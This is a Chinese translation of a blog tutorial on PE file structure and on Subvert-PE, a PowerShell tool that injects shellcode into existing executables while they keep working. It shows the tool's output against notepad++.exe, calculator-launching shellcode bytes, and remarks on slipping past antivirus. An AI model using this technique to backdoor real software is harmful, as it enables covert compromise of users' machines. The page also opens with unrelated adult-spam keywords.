真实的国产乱ⅩXXX66竹夫人,五月香六月婷婷激情综合,亚洲日本VA一区二区三区,亚洲精品一区二区三区麻豆

成都創(chuàng)新互聯(lián)網(wǎng)站制作重慶分公司

怎么用PowershellPE注入彈你一臉計(jì)算器

這篇文章給大家分享的是有關(guān)怎么用Powershell PE注入彈你一臉計(jì)算器的內(nèi)容。小編覺得挺實(shí)用的,因此分享給大家做個(gè)參考,一起跟隨小編過來看看吧。

專注于為中小企業(yè)提供網(wǎng)站設(shè)計(jì)、網(wǎng)站建設(shè)服務(wù),電腦端+手機(jī)端+微信端的三站合一,更高效的管理,為中小企業(yè)和田免費(fèi)做網(wǎng)站提供優(yōu)質(zhì)的服務(wù)。我們立足成都,凝聚了一批互聯(lián)網(wǎng)行業(yè)人才,有力地推動(dòng)了上千企業(yè)的穩(wěn)健成長,幫助中小企業(yè)通過網(wǎng)站建設(shè)實(shí)現(xiàn)規(guī)模擴(kuò)充和轉(zhuǎn)變。

我們將看看以編程的方式把shellcode注入到磁盤上的PE可執(zhí)行文件中,請注意我們僅僅只是在談?wù)揺xe文件,PE文件格式包括許多其他擴(kuò)展(dll,ocx,sys,cpl,fon,...)。手動(dòng)執(zhí)行此操作非常簡單,關(guān)鍵點(diǎn)在于需要確保PE的功能沒有改變,以免引起懷疑。但手動(dòng)注入往往不實(shí)用,你需要先復(fù)制一份PE,在你自己主機(jī)上更改它,然后替換目標(biāo)機(jī)器中的該文件。為了簡化這個(gè)過程,我創(chuàng)建了一個(gè)Subvert-PE程序,這個(gè)程序可以自動(dòng)化重寫一個(gè)PE可執(zhí)行文件(x86&x64)。修補(bǔ)入口點(diǎn)的偏移,注入shellcode并將執(zhí)行流返回到合法代碼中。我喜歡把工具給一些有機(jī)會(huì)理解它如何工作的人使用。這篇文章比較側(cè)重于審查PE格式的相關(guān)部分,在了解PE結(jié)構(gòu)后,用Powershell修改它就只是小兒科了。

此帖子可能包含Microsoft官方文檔中的信息/摘錄/圖像,這些信息在DMCA合理使用政策下提供。如果有人對此有任何問題,請給我發(fā)電子郵件。

鏈接:

[Microsoft Official PE-COFF Documentation (MSDN)]

[Portable Executable (Corkami)]

工具:

[Subvert-PE.ps1]

PE 頭

學(xué)習(xí)新知識(shí)的最好的方式是有一個(gè)具體的例子。為了在實(shí)踐中奠定基礎(chǔ),我們將一步步地完成32位notepad++的PE頭。PE頭通常包括以下組件:MS-DOS頭,富簽名,PE頭,可選頭和表分區(qū)。

我不會(huì)為每個(gè)section高亮所有有意義的WORD/DWORD/QWORD,因?yàn)檫@是一個(gè)粗略的概述。

MS-DOS頭:

在這個(gè)例子中,DOS 頭從映像的底部(0x00)一直延伸到0x7F(127字節(jié))。

怎么用Powershell PE注入彈你一臉計(jì)算器

在這里需要記住的重要東西是,在偏移位置0x3C(60字節(jié))處,是一個(gè)提供實(shí)際PE頭偏移位置的DWORD。PE頭的偏移位置不是固定不變的,它會(huì)隨著二進(jìn)制程序的變化而變化。當(dāng)然,對那些感興趣的人,靜態(tài)"MZ"標(biāo)識(shí)符對應(yīng)于MS-DOS開發(fā)人員之一Mark Zbikowski(首字母)。


富簽名(Rich Signature):

在這里提到富簽名主要是由于好奇。盡管PE格式已經(jīng)有很久的歷史(window3.1 - 1993),這一部分已經(jīng)被微軟取消文檔記錄(停止支持)。簡而言之,它存儲(chǔ)有關(guān)PE編譯的數(shù)據(jù)。有關(guān)深入概述,可以在[NTCORE](http://www.ntcore.com/files/richsign.htm)閱讀Daniel Pistelli的分析.

怎么用Powershell PE注入彈你一臉計(jì)算器

PE頭:

PE頭由ASCII簽名和標(biāo)準(zhǔn)COFF文件頭組成,應(yīng)該注意到在富簽名和PE頭之間存在空字節(jié)填充。對于Notepad++而言,填充的大小為0x0F(15字節(jié)),但是大小因PE而的不同而改變。

怎么用Powershell PE注入彈你一臉計(jì)算器

下面提供了更完整的圖片,你可以找到所有有關(guān)"機(jī)器類型(Machine Type)"和"特征(Characteristics)"的可能的值。這些都來自微軟的官方文檔。

怎么用Powershell PE注入彈你一臉計(jì)算器

怎么用Powershell PE注入彈你一臉計(jì)算器

可選標(biāo)頭:

可選標(biāo)頭向加載程序提供一些加載信息,這一部分僅是可選的,通常它不存在于對象文件中??蛇x標(biāo)頭的大小是會(huì)變化的,在上方PE頭中由可選標(biāo)頭大小表示。

怎么用Powershell PE注入彈你一臉計(jì)算器

許多部分沒有高亮,如果想要了解更完整的概述請參閱微軟官方文檔和[Corkami的分析]下方的圖片展示了所有可能的"Subsystem Type"(子系統(tǒng)值)字段值。

怎么用Powershell PE注入彈你一臉計(jì)算器

表分區(qū):表分區(qū)緊緊地跟在可選標(biāo)頭后面,這個(gè)順序是必須的,因?yàn)閳D像沒有包含指向這一部分的指針,偏移位置是根據(jù)PE頭的組合大小計(jì)算的。每一個(gè)被定義的區(qū)段大小為0x28(40字節(jié))。區(qū)段的數(shù)目可以從PE頭中獲取。

怎么用Powershell PE注入彈你一臉計(jì)算器

下方的圖片展示了所有可能的區(qū)段標(biāo)記值,然而通常情況下只有少數(shù)幾個(gè)會(huì)經(jīng)常性地出現(xiàn)(可讀/可執(zhí)行,初始化數(shù)據(jù),可丟棄)

怎么用Powershell PE注入彈你一臉計(jì)算器

怎么用Powershell PE注入彈你一臉計(jì)算器

怎么用Powershell PE注入彈你一臉計(jì)算器

上面的表只展示Notepad++PE的第一區(qū)段,其他區(qū)段(總共有4個(gè)區(qū)段),直接跟隨".text"區(qū)段。

怎么用Powershell PE注入彈你一臉計(jì)算器

用Powershell操作二進(jìn)制文件

現(xiàn)在我們對PE頭格式有了初步了解,我們可以開始查看從字節(jié)到二進(jìn)制文件的讀取和寫入字節(jié)。

操作數(shù)組:

我們首先該看的是16進(jìn)制字節(jié)和整數(shù)之間的相互轉(zhuǎn)換。

怎么用Powershell PE注入彈你一臉計(jì)算器

非常有趣,但是主要目標(biāo)仍然是編輯磁盤上的文件。我創(chuàng)建了一個(gè)簡單的4字節(jié)文件來說明如何實(shí)現(xiàn)。

怎么用Powershell PE注入彈你一臉計(jì)算器

編輯PE鏡像

是時(shí)候把理論付諸實(shí)踐了。為了解決編輯PE鏡像的問題,我們將給自己定一個(gè)簡單的目標(biāo),找到模塊入口點(diǎn)偏移位置,并用0xAABBCCDD重寫它。

怎么用Powershell PE注入彈你一臉計(jì)算器

在終端中運(yùn)行此腳本,會(huì)產(chǎn)生以下結(jié)果。

怎么用Powershell PE注入彈你一臉計(jì)算器

我們看看在免疫系統(tǒng)(Immunity)中加載PE的時(shí)候會(huì)出現(xiàn)什么。

怎么用Powershell PE注入彈你一臉計(jì)算器

你會(huì)發(fā)現(xiàn)入口點(diǎn)并不是0xAABBCCDD 而是0xAAFBCCDD。這是意料之中的,是因?yàn)镻E加載到內(nèi)存的時(shí)候,入口點(diǎn)偏移量會(huì)被添加到鏡像庫中,而鏡像庫的偏移位置為(0x00400000)。從我們的角度來看,這并不重要,因?yàn)槲覀兯龅娜魏蝿?dòng)態(tài)計(jì)算都會(huì)自動(dòng)添加到鏡像庫中。如果是rebase/ASLR,這個(gè)值可以是靜態(tài)也可以是動(dòng)態(tài)。

怎么用Powershell PE注入彈你一臉計(jì)算器

Subvert-PE

是時(shí)候起飛了!如果我們要修改PE,通常需要以下幾個(gè)步驟:

(1)計(jì)算第一個(gè)可執(zhí)行部分到空字節(jié)填充部分的偏移量;

(2)將模塊入口點(diǎn)替換為第一步計(jì)算的偏移量

(3)把我們的shellcode寫到那個(gè)偏移量上。

(4)將存根添加到shellcode中,該存根跳轉(zhuǎn)到合法入口點(diǎn)。

下的圖片描述了以上執(zhí)行流程。

怎么用Powershell PE注入彈你一臉計(jì)算器

如上面的介紹所說,執(zhí)行這些步驟并不比計(jì)算數(shù)組中的偏移量更復(fù)雜。為此,我創(chuàng)建了一個(gè)程序(Subvert-PE),可以動(dòng)態(tài)修改PE鏡像,并且支持x86和x64。Subvert-PE函數(shù)包含shellcode,用于啟動(dòng)計(jì)算器,此部分由SkyLined編寫。有關(guān)這一部分shellcode的更多細(xì)節(jié)可以在[這里]找到

讓我們來看看一個(gè)實(shí)際的例子。

```

PS C:\Users\b33f> . .\ToolKit\Subvert-PE.ps1

PS C:\Users\b33f> Get-Help Subvert-PE -Full

NAME

    Subvert-PE

SYNOPSIS

    Inject shellcode into a PE image while retaining the PE functionality.

    Author: Ruben Boonen (@FuzzySec)

    License: BSD 3-Clause

    Required Dependencies: None

    Optional Dependencies: None

SYNTAX

    Subvert-PE -Path [-Write] []

DESCRIPTION

    Parse a PE image, inject shellcode at the end of the code section and dynamically patch the entry

    point. After the shellcode executes, program execution is handed back over to the legitimate PE entry

    point.

PARAMETERS

    -Path

        Path to portable executable.

        Required?                    true

        Position?                    named

        Default value

        Accept pipeline input?       false

        Accept wildcard characters?

    -Write []

        Inject shellcode and overwrite the PE. If omitted simply display "Entry Point", "Preferred Image

        Base" and dump the memory at the null-byte location.

        Required?                    false

        Position?                    named

        Default value

        Accept pipeline input?       false

        Accept wildcard characters?

   

        This cmdlet supports the common parameters: Verbose, Debug,

        ErrorAction, ErrorVariable, WarningAction, WarningVariable,

        OutBuffer and OutVariable. For more information, type,

        "get-help about_commonparameters".

INPUTS

OUTPUTS

    -------------------------- EXAMPLE 1 --------------------------

    C:\PS>Subvert-PE -Path C:\Path\To\PE.exe

    -------------------------- EXAMPLE 2 --------------------------

    C:\PS>Subvert-PE -Path C:\Path\To\PE.exe -Write

RELATED LINKS

     [url]http://www.fuzzysecurity.com/[/url]

PS C:\Users\b33f> Subvert-PE -Path 'C:\Program Files\Notepad++\notepad++.exe' -Write

Legitimate Entry Point Offset:   0x000B7159

Preferred PE Image Base:         0x00400000

Null-Byte Padding dump:

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Modified Entry Point Offset:     0x000DA6B6

Inject Far JMP:                  0xe9fffdca54

Null-Byte Padding After:

31 D2 52 68 63 61 6C 63 89 E6 52 56 64 8B 72 30 8B 76 0C 8B 76

AD 8B 30 8B 7E 18 8B 5F 3C 8B 5C 1F 78 8B 74 1F 20 01 FE 8B 4C

24 01 F9 42 AD 81 3C 07 57 69 6E 45 75 F5 0F B7 54 51 FE 8B 74

1C 01 FE 03 3C 96 FF D7 E9 54 CA FD FF 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

```

下面的屏幕截圖我們可以看到notepad++正常啟動(dòng),并且同時(shí)打開了計(jì)算器!

怎么用Powershell PE注入彈你一臉計(jì)算器

下面的屏幕截圖展示了一些樣例注入,平臺(tái)分別為win7專業(yè)版32位和win8企業(yè)版

怎么用Powershell PE注入彈你一臉計(jì)算器

怎么用Powershell PE注入彈你一臉計(jì)算器

注意事項(xiàng):

(1)在PE可執(zhí)行程序中,此腳本大約有90%的成功率;但在64位系統(tǒng)中只有50%的成功率。這是因?yàn)樵趚64系統(tǒng)中空字節(jié)填充位非常小。一般來說你不應(yīng)該使用"-Write"選項(xiàng)來執(zhí)行腳本,

(2)顯然,shellcode可以用更有價(jià)值的代碼替換,為了避免濫用這里不做介紹。有幾件事你需要記?。河捎谖覀冃枰S持執(zhí)行流,所以shellcode沒有退出功能,當(dāng)shellcode作為PE代碼部分的時(shí)候無法自解壓,它不可寫。在少數(shù)測試用例中,PE要求初始注冊表值正確地運(yùn)行,因此,在執(zhí)行之后需要恢復(fù)這些值。

(3)注入已簽名二進(jìn)制文件將使簽名失效,但這只有在取證的時(shí)候需要關(guān)心。此外,因?yàn)槲覀冊诙ㄖ瓶蓤?zhí)行文件中隱藏了shellcode,殺軟無法知道正在發(fā)生什么,并且會(huì)很高興地讓程序運(yùn)行。我發(fā)現(xiàn)Comodo已經(jīng)注意到了對PE的修改,它隔離了可執(zhí)行文件,但仍然允許執(zhí)行。我懷疑它檢測到入口點(diǎn)已經(jīng)被篡改了。

(4)不要亂搞事,這個(gè)工具只有在授權(quán)之后才能創(chuàng)建使用!

感謝各位的閱讀!關(guān)于“怎么用Powershell PE注入彈你一臉計(jì)算器”這篇文章就分享到這里了,希望以上內(nèi)容可以對大家有一定的幫助,讓大家可以學(xué)到更多知識(shí),如果覺得文章不錯(cuò),可以把它分享出去讓更多的人看到吧!


當(dāng)前題目:怎么用PowershellPE注入彈你一臉計(jì)算器
文章地址:http://weahome.cn/article/jpessj.html

其他資訊

在線咨詢

微信咨詢

電話咨詢

028-86922220(工作日)

18980820575(7×24)

提交需求

返回頂部